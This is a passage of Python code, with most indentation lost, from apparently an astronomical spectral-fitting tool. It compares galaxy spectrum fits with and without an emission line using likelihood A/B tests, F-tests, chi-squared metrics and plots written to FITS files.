# ax1.plot(wave,resid_line,color="xkcd:bright aqua",linestyle="-",linewidth=0.5,label="Resid. with Line")
# ax1.plot(wave,resid_no_line,color="xkcd:bright purple",linestyle="-",linewidth=0.5,label="Resid. without Line")
ax1.plot(wave,resid_no_line-resid_line,color="xkcd:bright red",linestyle="-",linewidth=1.0,label=r"$\Delta~\rm{Residuals}$")
ax1.plot(wave,noise,color="xkcd:lime green",linestyle="-",linewidth=0.5,label="Noise")
ax1.plot(wave,-noise,color="xkcd:lime green",linestyle="-",linewidth=0.5)
# ax1.axvline(min_wave,color="xkcd:red",linestyle="--",linewidth=1,label="Line Test Region")
# ax1.axvline(max_wave,color="xkcd:red",linestyle="--",linewidth=1)
ax1.axhline(0,color="xkcd:white",linestyle="--",linewidth=0.75)
ax1.set_xlabel(r"$\lambda_{\rm{rest}}$ [$\rm{\AA}$]",fontsize=fontsize)
ax1.set_ylabel(r"$f_\lambda$ [$10^{-17}$ erg cm$^{-2}$ s$^{-1}$ $\rm{\AA}^{-1}$]",fontsize=fontsize)
ax1.set_title(r"Fitting Region Residuals",fontsize=fontsize)
ax1.tick_params(axis='both', labelsize= fontsize)
ax1.set_xlim(np.min(wave),np.max(wave))
ax1.legend(fontsize=12)
#
# Sample the noise around the best-fit
nsamp = 10000
resid_line_lnlike = np.empty(nsamp)
resid_no_line_lnlike = np.empty(nsamp)
for i in range(nsamp):
lnlike_line = np.sum(-0.5*(np.random.normal(loc=resid_line[eval_ind],scale=noise[eval_ind],size=len(eval_ind)))**2/noise[eval_ind]**2)
lnlike_no_line = np.sum(-0.5*(np.random.normal(loc=resid_no_line[eval_ind],scale=noise[eval_ind],size=len(eval_ind)))**2/noise[eval_ind]**2)
resid_line_lnlike[i] = lnlike_line
resid_no_line_lnlike[i] = lnlike_no_line
#
ax2.hist(resid_line_lnlike,bins="doane",histtype="step",label="Line",density=True,color="xkcd:bright aqua",linewidth=0.5)
p_line = np.percentile(resid_line_lnlike,[16,50,84])
ax2.axvline(p_line[1],color="xkcd:bright aqua", linestyle='--', linewidth=1,)
ax2.axvspan(p_line[0], p_line[2], alpha=0.25, color='xkcd:bright aqua')
#
ax2.hist(resid_no_line_lnlike,bins="doane",histtype="step",label="No Line",density=True,color="xkcd:bright orange",linewidth=0.5)
p_no_line = np.percentile(resid_no_line_lnlike,[16,50,84])
ax2.axvline(p_no_line[1],color="xkcd:bright orange", linestyle='--', linewidth=1,)
ax2.axvspan(p_no_line[0], p_no_line[2], alpha=0.25, color='xkcd:bright orange')
ax2.set_title("Log-Likelihood",fontsize=fontsize)
ax2.tick_params(axis='both', labelsize= fontsize)
ax2.legend()
# The sampled log-likelihoods should be nearly Gaussian
x = np.arange(np.min([resid_line_lnlike, resid_no_line_lnlike]),np.max([resid_line_lnlike, resid_no_line_lnlike]),0.1)
norm_line = stats.norm(loc=p_line[1],scale=np.mean([p_line[2]-p_line[1],p_line[1]-p_line[0]]))
norm_no_line = stats.norm(loc=p_no_line[1],scale=np.mean([p_no_line[2]-p_no_line[1],p_no_line[1]-p_no_line[0]]))
#
ax2.plot(x,norm_line.pdf(x),color="xkcd:bright aqua",linewidth=1)
ax2.plot(x,norm_no_line.pdf(x),color="xkcd:bright orange",linewidth=1)
#
# Determine which distribution has the maximum likelihood.
# Null Hypothesis, H0: B is no different than A
# Alternative Hypothesis, H1: B is significantly different from A
A = resid_no_line_lnlike # no line model
A_mean = p_no_line[1]
B = resid_line_lnlike # line model
ntrials = 10000
B_samples = norm_line.rvs(size=ntrials)
pvalues = np.array([(norm_no_line.sf(b)) for b in B_samples])*2.0
pvalues[pvalues>1] = 1
pvalues[pvalues<1e-6] = 0
conf = (1 - pvalues)
#
ax3.hist(pvalues,bins="doane",histtype="step",label="Line",density=True,color="xkcd:bright aqua",linewidth=0.5)
p_pval = np.percentile(pvalues,[16,50,84])
ax3.axvline(p_pval[1],color="xkcd:bright aqua", linestyle='--', linewidth=1,)
ax3.axvspan(p_pval[0], p_pval[2], alpha=0.25, color='xkcd:bright aqua')
ax3.set_title(r"$p$-values",fontsize=fontsize)
#
ax4.hist(conf,bins="doane",histtype="step",label="No Line",density=True,color="xkcd:bright aqua",linewidth=0.5)
p_conf = np.percentile(conf,[16,50,84])
# np.save(run_dir.joinpath("conf_arr.npy"),conf)
ax4.axvline(p_conf[1],color="xkcd:bright aqua", linestyle='--', linewidth=1,)
ax4.axvspan(p_conf[0], p_conf[2], alpha=0.25, color='xkcd:bright aqua')
ax4.set_title(r"Confidence",fontsize=fontsize)
ax3.tick_params(axis='both', labelsize= fontsize)
#
ax4.tick_params(axis='both', labelsize= fontsize)
#
# print(" p-value = %0.4f +/- (%0.4f,%0.4f)" % (p_pval[1],p_pval[2]-p_pval[1],p_pval[1]-p_pval[0]))
# print(" Confidence = %0.4f +/- (%0.4f,%0.4f)" % (p_conf[1],p_conf[2]-p_conf[1],p_conf[1]-p_conf[0]))
#
d = np.abs(p_line[1] - p_no_line[1]) # statistical distance
disp = np.sqrt((np.mean([p_line[2]-p_line[1],p_line[1]-p_line[0]]))**2+(np.mean([p_no_line[2]-p_no_line[1],p_no_line[1]-p_no_line[0]]))**2) # total dispersion
signif = d/disp # significance
overlap = np.min([(p_line[2]-p_no_line[0]), (p_no_line[2]-p_line[0])]).clip(0) # 1-sigma overlap
ax5.axvline(0.0,color="black",label="\n $p$-value = %0.4f +/- (%0.4f, %0.4f)" % (p_pval[1],p_pval[2]-p_pval[1],p_pval[1]-p_pval[0]))
ax5.axvline(0.0,color="black",label="\n Confidence = %0.4f +/- (%0.4f, %0.4f)" % (p_conf[1],p_conf[2]-p_conf[1],p_conf[1]-p_conf[0]))
ax5.axvline(0.0,color="black",label="\n Statistical Distance = %0.4f" % d)
ax5.axvline(0.0,color="black",label="\n Combined Dispersion = %0.4f" % disp)
ax5.axvline(0.0,color="black",label="\n Significance ($\sigma$) = %0.4f" % signif)
ax5.axvline(0.0,color="black",label="\n $1\sigma$ Overlap = %0.4f \n" % overlap)
ax5.legend(loc="center",fontsize=fontsize,frameon=False)
ax5.axis('off')
fig.tight_layout()
plt.savefig(run_dir.joinpath('test_results.pdf'))
plt.close()
return p_pval[1],p_pval[2]-p_pval[1],p_pval[1]-p_pval[0], p_conf[1],p_conf[2]-p_conf[1],p_conf[1]-p_conf[0], d, disp, signif, overlap
##################################################################################
def line_test(param_dict,
line_list,
combined_line_list,
soft_cons,
lam_gal,
galaxy,
noise,
z,
cosmology,
fit_reg,
user_lines,
user_constraints,
combined_lines,
test_line,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type='init',
fit_stat="RCHI2",
output_model=False,
test_outflows=False,
n_basinhop=5,
max_like_niter=10,
verbose=True,
binnum=None,
spaxelx=None,
spaxely=None):
"""
Performs component (or line) testing based on user input wavelength range.
"""
if (test_outflows==True):
remove_lines = [line for line in line_list if line_list[line]["line_type"]=="out"]
elif (test_outflows==False):
if isinstance(test_line["line"],str):
remove_lines = [test_line["line"]]
elif isinstance(test_line["line"],list):
remove_lines = test_line["line"]
# Perform fitting with line
if verbose:
print('\n Fitting with %s...' % remove_lines)
mcpars_line, mccomps_line, mcLL_line = max_likelihood(param_dict,
line_list,
combined_line_list,
soft_cons,
lam_gal,
galaxy,
noise,
z,
cosmology,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type='init',
fit_stat=fit_stat,
output_model=False,
test_outflows=True,
n_basinhop=n_basinhop,
max_like_niter=max_like_niter,
verbose=verbose)
# Perform fitting without line
if verbose:
print('\n Fitting without %s...' % remove_lines)
# Make copy of original line list, since initialize_pars() will override it.
original_line_list = copy.deepcopy(line_list)
# Generate new parameters
param_dict_no_line, line_list_no_line, combined_line_list_no_line, soft_cons_no_line = initialize_pars(lam_gal,galaxy,noise,fit_reg,fwhm_gal,fit_mask,velscale,
comp_options,user_lines,user_constraints,combined_lines,losvd_options,host_options,power_options,poly_options,
opt_feii_options,uv_iron_options,balmer_options,
run_dir,fit_type='init',fit_stat=fit_stat,
fit_opt_feii=comp_options["fit_opt_feii"],fit_uv_iron=comp_options["fit_uv_iron"],fit_balmer=comp_options["fit_balmer"],
fit_losvd=comp_options["fit_losvd"],fit_host=comp_options["fit_host"],fit_power=comp_options["fit_power"],fit_poly=comp_options["fit_poly"],
fit_narrow=comp_options["fit_narrow"],fit_broad=comp_options["fit_broad"],fit_outflow=comp_options["fit_outflow"],fit_absorp=comp_options["fit_absorp"],
tie_line_fwhm=comp_options["tie_line_fwhm"],tie_line_voff=comp_options["tie_line_voff"],remove_lines=remove_lines,verbose=verbose)
mcpars_no_line, mccomps_no_line, mcLL_no_line = max_likelihood(param_dict_no_line,
line_list_no_line,
combined_line_list_no_line,
soft_cons_no_line,
lam_gal,
galaxy,
noise,
z,
cosmology,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type='init',
fit_stat=fit_stat,
output_model=False,
test_outflows=True,
n_basinhop=n_basinhop,
max_like_niter=max_like_niter,
verbose=verbose)
# if fit_stat = "RCHI2", we need to scale the input noise so that the
# line tests are using the properly scaled noise.
if fit_stat=="RCHI2":
noise *= np.nanmean([mcpars_line["NOISE_SCALE"]["med"], mcpars_no_line["NOISE_SCALE"]["med"]])
# Determine the wavelength bounds and channels over which the test statistics are evaluated.
# The full profile (e.g., core + outflow) of the tested line(s) is passed to get_wavelength_range(),
# which currently evaluates over the entire fitting region.
if isinstance(remove_lines,str):
full_profile = np.median(mccomps_line[remove_lines],axis=0)
elif isinstance(remove_lines,list):
full_profile = np.median(np.sum([mccomps_line[l] for l in remove_lines],axis=1),axis=0)
# min_wave, max_wave, eval_ind, nchannel = get_wavelength_range(lam_gal,noise,velscale,full_profile,line_list[test_line["line"]])
min_wave, max_wave, eval_ind, nchannel = get_wavelength_range(lam_gal[fit_mask],noise[fit_mask],velscale,full_profile[fit_mask])#,line_list[test_line["line"]])
# storage arrays for residuals in [OIII] test region
resid_line = np.empty((max_like_niter+1,nchannel))
resid_no_line = np.empty((max_like_niter+1,nchannel))
resid_total = np.empty((max_like_niter+1,len(lam_gal[fit_mask])))
for i in range(max_like_niter+1):
resid_line[i,:] = mccomps_line['RESID'][i,:][fit_mask][eval_ind]
resid_no_line[i,:] = mccomps_no_line['RESID'][i,:][fit_mask][eval_ind]
resid_total[i,:] = mccomps_line['RESID'][i,:][fit_mask]
# Perform Bayesian A/B test
pval, pval_upp, pval_low, conf, conf_upp, conf_low, dist, disp, signif, overlap = bayesian_AB_test(mccomps_line['RESID'][0,:][fit_mask], mccomps_no_line['RESID'][0,:][fit_mask], full_profile[fit_mask], lam_gal[fit_mask], noise[fit_mask], galaxy[fit_mask], min_wave, max_wave, eval_ind, nchannel, run_dir)
# Calculate sum-of-square of residuals and its uncertainty
ssr_ratio, ssr_ratio_err, ssr_no_line, ssr_no_line_err, ssr_line, ssr_line_err = ssr_test(resid_line,resid_no_line,run_dir)
# Perform f-test model comparison(for normally distributed model residuals)
f_stat, f_stat_err, f_pval, f_pval_err, f_conf, f_conf_err = f_test(resid_line,resid_no_line,1.0,4.0,run_dir)
# Calculate total residual noise
resid_noise_no_line = np.median([np.std(resid_no_line[i,:]) for i in range(np.shape(resid_no_line)[0])])
resid_noise_no_line_err = np.std([np.std(resid_no_line[i,:]) for i in range(np.shape(resid_no_line)[0])])
resid_noise_line = np.median([np.std(resid_line[i,:]) for i in range(np.shape(resid_line)[0])])
resid_noise_line_err = np.std([np.std(resid_line[i,:]) for i in range(np.shape(resid_line)[0])])
total_resid_noise = np.median([np.std(resid_total[i,:]) for i in range(np.shape(resid_total)[0])])
total_resid_noise_err = np.std([np.std(resid_total[i,:]) for i in range(np.shape(resid_total)[0])])
# Chi2 Metrics
# Chi-squared is evaluated in the region of the line for the two models
# The ratio of chi squared for the outflow to the no-outflow model indicates
# how much the model improved over the other.
chi2_line, chi2_line_err, chi2_no_line, chi2_no_line_err, chi2_ratio, chi2_ratio_err = chi2_metric(range(len(lam_gal)),mccomps_line, mccomps_no_line)
if verbose:
print('\n{0:<30}{1:<30}{2:<30}{3:<30}'.format('Parameter', 'Best-fit Value', '+/- 1-sigma','Flag'))
print('-----------------------------------------------------------------------------------------------------')
# Sort into arrays
pname = []
med = []
std = []
flag = []
for key in mcpars_line:
pname.append(key)
med.append(mcpars_line[key]['med'])
std.append(mcpars_line[key]['std'])
flag.append(mcpars_line[key]['flag'])
i_sort = np.argsort(pname)
pname = np.array(pname)[i_sort]
med = np.array(med)[i_sort]
std = np.array(std)[i_sort]
flag = np.array(flag)[i_sort]
if verbose:
for i in range(0,len(pname),1):
print('{0:<30}{1:<30.2f}{2:<30.2f}{3:<30}'.format(pname[i], med[i], std[i], flag[i]))
print('-----------------------------------------------------------------------------------------------------')
print('\n Test Statistics:')
print('-----------------------------------------------------------------------------------------------------')
print('{0:<30}{1:<30}{2:<30}{3:<30}'.format('','Statistic','Value','Uncertainty') )
print('-----------------------------------------------------------------------------------------------------')
print('{0:<30}'.format('A/B Likelihood Test:'))
print('{0:<30}{1:<30}{2:<30.6f}{3:<30}'.format('','Confidence:',conf,"(-%0.6f,+%0.6f)" % (conf_low,conf_upp )) )
print('{0:<30}{1:<30}{2:<30.6f}{3:<30}'.format('','p-value:',pval,"(-%0.6f,+%0.6f)" % (pval_low,pval_upp)))
print('{0:<30}{1:<30}{2:<30.6f}'.format('','Statistical Distance:',dist))
print('{0:<30}{1:<30}{2:<30.6f}'.format('','Dispersion:',disp))
print('{0:<30}{1:<30}{2:<30.6f}'.format('','Significance (sigma):',signif))
print('{0:<30}{1:<30}{2:<30.6f}'.format('','Overlap (1-sigma):',overlap))
print('{0:<30}'.format('ANOVA (F-test):'))
print('{0:<30}{1:<30}{2:<30.4f}{3:<30.4f}'.format('','Confidence:',f_conf, f_conf_err ) )
print('{0:<30}{1:<30}{2:<30.4f}{3:<30.4f}'.format('','F-statistic:',f_stat,f_stat_err))
print('{0:<30}{1:<30}{2:<30.4e}{3:<30.4e}'.format('','p-value:',f_pval,f_pval_err))
print('{0:<30}'.format('Chi-Squared Metrics:'))
print('{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','Chi-squared Ratio:',chi2_ratio, chi2_ratio_err ) )
print('{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','Chi-squared no-outflow:',chi2_no_line,chi2_no_line_err))
print('{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','Chi-squared outflow:',chi2_line,chi2_line_err))
print('{0:<30}'.format('Sum-of-Squares of Residuals (SSR):'))
print('{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','SSR ratio:',ssr_ratio,ssr_ratio_err))
print('{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','SSR no-outflow:',ssr_no_line,ssr_no_line_err))
print('{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','SSR outflow:',ssr_line,ssr_line_err))
print('{0:<30}'.format('Residual Noise:'))
print('{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','Median spec noise:',np.median(noise),np.std(noise)))
print('{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','Total resid noise:',total_resid_noise,total_resid_noise_err))
print('{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','No-line resid:',resid_noise_no_line,resid_noise_no_line_err))
print('{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','Line resid:',resid_noise_line,resid_noise_line_err))
print('-----------------------------------------------------------------------------------------------------')
# Write to log
write_log(mcpars_no_line,'no_line_test',run_dir)
write_log(mcpars_line,'line_test',run_dir)
write_log((pval, pval_upp, pval_low, conf, conf_upp, conf_low, dist, disp, signif, overlap,
f_conf,f_conf_err,f_stat,f_stat_err,f_pval,f_pval_err,
chi2_ratio,chi2_ratio_err,chi2_no_line,chi2_no_line_err,chi2_line,chi2_line_err,
# amp_metric,fwhm_metric,voff_metric,voff_metric_err,
ssr_ratio,ssr_ratio_err,ssr_no_line,ssr_no_line_err,ssr_line,ssr_line_err,
np.median(noise), np.std(noise),
total_resid_noise,total_resid_noise_err,resid_noise_no_line,resid_noise_no_line_err,resid_noise_line,resid_noise_line_err),
'line_test_stats',run_dir)
# Write test statistics to FITS table
stats_dict = {
"PVAL": {"best": pval, "sigma_low": pval_low, "sigma_upp": pval_upp },
"CONF": {"best": conf, "sigma_low": conf_low, "sigma_upp": conf_upp},
"DIST": {"best": dist, "sigma_low": 0.0, "sigma_upp": 0.0},
"DISP": {"best": disp, "sigma_low": 0.0, "sigma_upp": 0.0},
"SIGNIF": {"best": signif, "sigma_low": 0.0, "sigma_upp": 0.0},
"OVERLAP": {"best": overlap, "sigma_low": 0.0, "sigma_upp": 0.0},
"F_CONF": {"best": f_conf, "sigma_low": f_conf_err, "sigma_upp": f_conf_err},
"F_STAT": {"best": f_stat, "sigma_low": f_stat_err, "sigma_upp": f_stat_err},
"F_PVAL": {"best": f_pval, "sigma_low": f_pval_err, "sigma_upp": f_pval_err},
"CHI2_LINE": {"best": chi2_line, "sigma_low": chi2_line_err, "sigma_upp": chi2_line_err},
"CHI2_NO_LINE": {"best": chi2_no_line, "sigma_low": chi2_no_line_err, "sigma_upp": chi2_no_line_err},
"CHI2_RATIO": {"best": chi2_ratio, "sigma_low": chi2_ratio_err, "sigma_upp": chi2_ratio_err},
"SSR_RATIO": {"best": ssr_ratio, "sigma_low": ssr_ratio_err, "sigma_upp": ssr_ratio_err},
"SSR_NO_LINE": {"best": ssr_no_line, "sigma_low": ssr_no_line_err, "sigma_upp": ssr_no_line_err},
"SSR_LINE": {"best": ssr_line, "sigma_low": ssr_line_err, "sigma_upp": ssr_line_err},
"MEDIAN_NOISE": {"best": np.median(noise), "sigma_low": np.std(noise), "sigma_upp": np.std(noise)},
"RESID_NOISE": {"best": total_resid_noise, "sigma_low": total_resid_noise_err, "sigma_upp": total_resid_noise_err},
"RESID_NOISE_NO_LINE": {"best": resid_noise_no_line, "sigma_low": resid_noise_no_line_err, "sigma_upp": resid_noise_no_line_err},
"RESID_NOISE_LINE": {"best": resid_noise_line, "sigma_low": resid_noise_line_err, "sigma_upp": resid_noise_line_err},
}
write_test_stats(stats_dict,run_dir)
# Reinstate the original line list
line_list = original_line_list
# Make plot
# Get best fit model components for each model
param_names_line = [key for key in param_dict ]
params_line = [mcpars_line[key]['med'] for key in param_dict ]
fit_type = 'line_test'
output_model = False
comp_dict_line = fit_model(params_line,
param_names_line,
line_list,
combined_line_list,
lam_gal,
galaxy,
noise,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type,
fit_stat,
output_model)
param_names_no_line = [key for key in param_dict_no_line ]
params_no_line = [mcpars_no_line[key]['med'] for key in param_dict_no_line ]
fit_type = 'line_test'
output_model = False
comp_dict_no_line = fit_model(params_no_line,
param_names_no_line,
line_list_no_line,
combined_line_list_no_line,
lam_gal,
galaxy,
noise,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type,
fit_stat,
output_model)
# Make comparison plots of outflow and no-outflow models
line_test_plot(lam_gal,comp_dict_line,comp_dict_no_line,line_list,line_list_no_line,
params_line,params_no_line,param_names_line,param_names_no_line,min_wave,max_wave,run_dir)
# Write results to FITS
write_line_test_results(mcpars_line,comp_dict_line,mcpars_no_line,comp_dict_no_line,fit_mask,run_dir,binnum,spaxelx,spaxely)
return
##################################################################################
def get_wavelength_range(lam_gal, noise, velscale, full_profile):#, line_dict):
# Get indices where we perform f-test
eval_ind = range(len(lam_gal))
# number of channels in the test region
nchannel = len(eval_ind)
	# If the number of channels is <= 6 (the number of degrees of freedom for the double-Gaussian model), the calculated
	# f-statistic will be zero. To resolve this, we pad the region by (7 - nchannel) pixels on each side so that it
	# contains more than 6 channels.
if nchannel <= 6:
add_chan = 7 - nchannel# number of channels to add to each side; minimum is 7 channels since deg. of freedom = 6
lower_pad = np.arange(eval_ind[0]-add_chan,eval_ind[0],1)#np.arange(eval_ind[0]-add_chan,eval_ind[0],1)
upper_pad = np.arange(eval_ind[-1]+1,eval_ind[-1]+1+add_chan,1)
eval_ind = np.concatenate([lower_pad, eval_ind, upper_pad],axis=0)
nchannel = len(eval_ind)
min_wave, max_wave = lam_gal[eval_ind[0]], lam_gal[eval_ind[-1]]
return min_wave, max_wave, eval_ind, nchannel
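	# Illustrative example (not executed): if the evaluation region initially contains only 4 channels,
	# add_chan = 7 - 4 = 3, so 3 pixels are appended to each side of the region, giving
	# nchannel = 10 and a non-degenerate f-statistic.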
##################################################################################
def write_test_stats(stats_dict,run_dir):
"""
Writes statistics for outflow and line testing to a FITS table.
"""
#
#
# Write Outflow model FITS tables
# Extract elements from dictionaries
par_names = []
par_best = []
sig_low = []
sig_upp = []
for key in stats_dict:
par_names.append(key)
par_best.append(stats_dict[key]['best'])
sig_low.append(stats_dict[key]['sigma_low'])
sig_upp.append(stats_dict[key]['sigma_upp'])
if 0:
for i in range(0,len(par_names),1):
			print(par_names[i],par_best[i],sig_low[i],sig_upp[i])
# Write best-fit parameters to FITS table
col1 = fits.Column(name='parameter', format='30A', array=par_names)
col2 = fits.Column(name='best_fit' , format='E' , array=par_best)
col3 = fits.Column(name='sigma_low' , format='E' , array=sig_low)
col4 = fits.Column(name='sigma_upp' , format='E' , array=sig_upp)
cols = fits.ColDefs([col1,col2,col3,col4])
hdu = fits.BinTableHDU.from_columns(cols)
hdu.writeto(run_dir.joinpath('log', 'test_stats.fits'),overwrite=True)
#
return
##################################################################################
def line_test_plot(lam_gal,comp_dict_outflow,comp_dict_no_outflow,line_list_outflows,line_list_no_outflows,
params_outflows,params_no_outflows,param_names_outflows,param_names_no_outflows,min_wave,max_wave,run_dir):
"""
	The plotting function for test_line(). It plots both the line (outflow)
	and no-line (no-outflow) model results.
"""
def poly_label(kind):
if kind=="ppoly":
order = len([p for p in param_names_outflows if p.startswith("PPOLY_") ])-1
if kind=="apoly":
order = len([p for p in param_names_outflows if p.startswith("APOLY_")])-1
if kind=="mpoly":
order = len([p for p in param_names_outflows if p.startswith("MPOLY_")])-1
#
ordinal = lambda n: "%d%s" % (n,"tsnrhtdd"[(n//10%10!=1)*(n%10<4)*n%10::4])
return ordinal(order)
def calc_new_center(center,voff):
"""
		Calculates the new line center shifted
		by some velocity offset.
"""
c = 299792.458 # speed of light (km/s)
new_center = (voff*center)/c + center
return new_center
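	# Illustrative example (not executed): for a line with rest-frame center 6564.61 A and a fitted
	# voff of +500 km/s, calc_new_center(6564.61, 500.0) returns ~6575.56 A, i.e. the annotation is
	# shifted by (500/299792.458)*6564.61 ~ +10.9 A.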
	# Create plot window and axes
fig = plt.figure(figsize=(14,11))
gs = gridspec.GridSpec(9,1)
	ax1 = fig.add_subplot(gs[0:3,0]) # Line (outflow) model
	ax2 = fig.add_subplot(gs[3:4,0]) # Line (outflow) model residuals
	ax3 = fig.add_subplot(gs[5:8,0]) # No-line (no-outflow) model
	ax4 = fig.add_subplot(gs[8:9,0]) # No-line (no-outflow) model residuals
gs.update(wspace=0.0, hspace=0.0) # set the spacing between axes.
	# Line (outflow) model (ax1,ax2)
# Put params in dictionary
p = dict(zip(param_names_outflows,params_outflows))
for key in comp_dict_outflow:
if (key=='DATA'):
ax1.plot(comp_dict_outflow['WAVE'],comp_dict_outflow['DATA'],linewidth=0.5,color='white',label='Data',zorder=0)
elif (key=='MODEL'):
ax1.plot(lam_gal,comp_dict_outflow[key], color='xkcd:bright red', linewidth=1.0, label='Model', zorder=15)
elif (key=='HOST_GALAXY'):
ax1.plot(comp_dict_outflow['WAVE'], comp_dict_outflow['HOST_GALAXY'], color='xkcd:bright green', linewidth=0.5, linestyle='-', label='Host/Stellar')
elif (key=='POWER'):
ax1.plot(comp_dict_outflow['WAVE'], comp_dict_outflow['POWER'], color='xkcd:red' , linewidth=0.5, linestyle='--', label='AGN Cont.')
elif (key=='PPOLY'):
ax1.plot(comp_dict_outflow['WAVE'], comp_dict_outflow['PPOLY'], color='xkcd:magenta' , linewidth=0.5, linestyle='-', label='%s-order Poly.' % (poly_label("ppoly")))
elif (key=='APOLY'):
ax1.plot(comp_dict_outflow['WAVE'], comp_dict_outflow['APOLY'], color='xkcd:bright purple' , linewidth=0.5, linestyle='-', label='%s-order Add. Poly.' % (poly_label("apoly")))
elif (key=='MPOLY'):
ax1.plot(comp_dict_outflow['WAVE'], comp_dict_outflow['MPOLY'], color='xkcd:lavender' , linewidth=0.5, linestyle='-', label='%s-order Mult. Poly.' % (poly_label("mpoly")))
elif (key in ['NA_OPT_FEII_TEMPLATE','BR_OPT_FEII_TEMPLATE']):
ax1.plot(comp_dict_outflow['WAVE'], comp_dict_outflow['NA_OPT_FEII_TEMPLATE'], color='xkcd:yellow', linewidth=0.5, linestyle='-' , label='Narrow FeII')
ax1.plot(comp_dict_outflow['WAVE'], comp_dict_outflow['BR_OPT_FEII_TEMPLATE'], color='xkcd:orange', linewidth=0.5, linestyle='-' , label='Broad FeII')
elif (key in ['F_OPT_FEII_TEMPLATE','S_OPT_FEII_TEMPLATE','G_OPT_FEII_TEMPLATE','Z_OPT_FEII_TEMPLATE']):
if key=='F_OPT_FEII_TEMPLATE':
ax1.plot(comp_dict_outflow['WAVE'], comp_dict_outflow['F_OPT_FEII_TEMPLATE'], color='xkcd:yellow', linewidth=0.5, linestyle='-' , label='F-transition FeII')
elif key=='S_OPT_FEII_TEMPLATE':
ax1.plot(comp_dict_outflow['WAVE'], comp_dict_outflow['S_OPT_FEII_TEMPLATE'], color='xkcd:mustard', linewidth=0.5, linestyle='-' , label='S-transition FeII')
elif key=='G_OPT_FEII_TEMPLATE':
ax1.plot(comp_dict_outflow['WAVE'], comp_dict_outflow['G_OPT_FEII_TEMPLATE'], color='xkcd:orange', linewidth=0.5, linestyle='-' , label='G-transition FeII')
elif key=='Z_OPT_FEII_TEMPLATE':
ax1.plot(comp_dict_outflow['WAVE'], comp_dict_outflow['Z_OPT_FEII_TEMPLATE'], color='xkcd:rust', linewidth=0.5, linestyle='-' , label='Z-transition FeII')
elif (key=='UV_IRON_TEMPLATE'):
ax1.plot(comp_dict_outflow['WAVE'], comp_dict_outflow['UV_IRON_TEMPLATE'], color='xkcd:bright purple', linewidth=0.5, linestyle='-' , label='UV Iron' )
elif (key=='BALMER_CONT'):
ax1.plot(comp_dict_outflow['WAVE'], comp_dict_outflow['BALMER_CONT'], color='xkcd:bright green', linewidth=0.5, linestyle='--' , label='Balmer Continuum' )
# Plot emission lines by cross-referencing comp_dict with line_list
if (key in line_list_outflows):
if (line_list_outflows[key]["line_type"]=="na"):
ax1.plot(comp_dict_outflow['WAVE'], comp_dict_outflow[key], color='xkcd:cerulean', linewidth=0.5, linestyle='-', label='Narrow/Core Comp.')
if (line_list_outflows[key]["line_type"]=="br"):
ax1.plot(comp_dict_outflow['WAVE'], comp_dict_outflow[key], color='xkcd:bright teal', linewidth=0.5, linestyle='-', label='Broad Comp.')
if (line_list_outflows[key]["line_type"]=="out"):
ax1.plot(comp_dict_outflow['WAVE'], comp_dict_outflow[key], color='xkcd:bright pink', linewidth=0.5, linestyle='-', label='Outflow Comp.')
if (line_list_outflows[key]["line_type"]=="abs"):
ax1.plot(comp_dict_outflow['WAVE'], comp_dict_outflow[key], color='xkcd:pastel red', linewidth=0.5, linestyle='-', label='Absorption Comp.')
if (line_list_outflows[key]["line_type"]=="user"):
ax1.plot(comp_dict_outflow['WAVE'], comp_dict_outflow[key], color='xkcd:electric lime', linewidth=0.5, linestyle='-', label='Other')
ax1.axvline(min_wave,color="xkcd:yellow",linewidth=1,linestyle="--")
ax1.axvline(max_wave,color="xkcd:yellow",linewidth=1,linestyle="--")
ax2.axvline(min_wave,color="xkcd:yellow",linewidth=1,linestyle="--")
ax2.axvline(max_wave,color="xkcd:yellow",linewidth=1,linestyle="--")
ax1.set_xticklabels([])
ax1.set_xlim(np.min(lam_gal)-10,np.max(lam_gal)+10)
# ax1.set_ylim(-0.5*np.median(comp_dict['MODEL']),np.max([comp_dict['DATA'],comp_dict['MODEL']]))
ax1.set_ylabel(r'$f_\lambda$ ($10^{-17}$ erg cm$^{-2}$ s$^{-1}$ $\mathrm{\AA}^{-1}$)',fontsize=10)
# Residuals
sigma_resid = np.nanstd(comp_dict_outflow['DATA']-comp_dict_outflow['MODEL'])
sigma_noise = np.median(comp_dict_outflow['NOISE'])
ax2.plot(lam_gal,(comp_dict_outflow['NOISE']*3.0),linewidth=0.5,color="xkcd:bright orange",label='$\sigma_{\mathrm{noise}}=%0.4f$' % (sigma_noise))
ax2.plot(lam_gal,(comp_dict_outflow['RESID']*3.0),linewidth=0.5,color="white",label='$\sigma_{\mathrm{resid}}=%0.4f$' % (sigma_resid))
ax2.axhline(0.0,linewidth=1.0,color='white',linestyle='--')
# Axes limits
